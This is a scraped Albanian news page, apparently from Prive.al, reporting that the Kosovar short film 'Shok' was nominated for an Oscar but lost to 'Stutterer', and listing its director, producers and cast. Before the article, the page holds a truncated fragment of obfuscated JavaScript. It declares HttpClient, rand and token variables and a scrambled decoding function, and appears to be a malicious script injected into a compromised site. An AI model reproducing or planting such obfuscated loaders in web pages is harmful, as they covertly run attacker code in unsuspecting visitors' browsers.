;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Megjithatë, ‘Shok’ nuk fiton Oscar

By

Kur Rita Ora performoi vitin e kaluar në ceremoninë e 87-të të ndarjes së çmimeve Oscar, krenaria shpërtheu kudo tek ne. Fakti se një shqiptare arriti të shkel në skenën prestigjioze të Oscar për të interpretuar përbënte një arritje të madhe.

Atëbotë që i bie të jetë vetëm 370 ditë më parë, askush nuk do të besonte se vetëm një vit pas, një prodhim kinematografik kosovar do nominohej për këtë çmim prestigjioz. Bum! Ëndrra u bë realitet!

Kosova e vogël, me papunësi të lartë e probleme bazike arriti të shkëlqejë në piedestalin e kinematografisë botërore me ‘Shok’, filmin e metrazhit të shkurtër që portretizonte një ngjarje të vërtetë të mizorisë e agresionit serb në fundin e viteve të 90-ta.

Megjithatë, ky rrëfim prekës  mes ‘Ave Maria’, ‘Day One’, ‘Everything Will Be Okay’ e ‘Stutterer’, nuk arriti të triumfoj si filmi më i mirë i metrazhit të shkurtër pasiqë triumfues doli filmi ‘Stutterer’.

Filmi ‘Shok’ ka regji dhe skenar të Jamie Donoughue kurse producent të filmit janë Eshref Durmishi dhe Harvey Ascott.

Në këtë film luajnë aktorët kosovar: Fisnik Ademi, Aurita Agushi, Andi Bajgora, Eni Cani, Eshref Durmishi, Xhevdet Jashari, Astrit Kabashi. /Prive.al/

(Vijon)

Artikuj të ngjashëm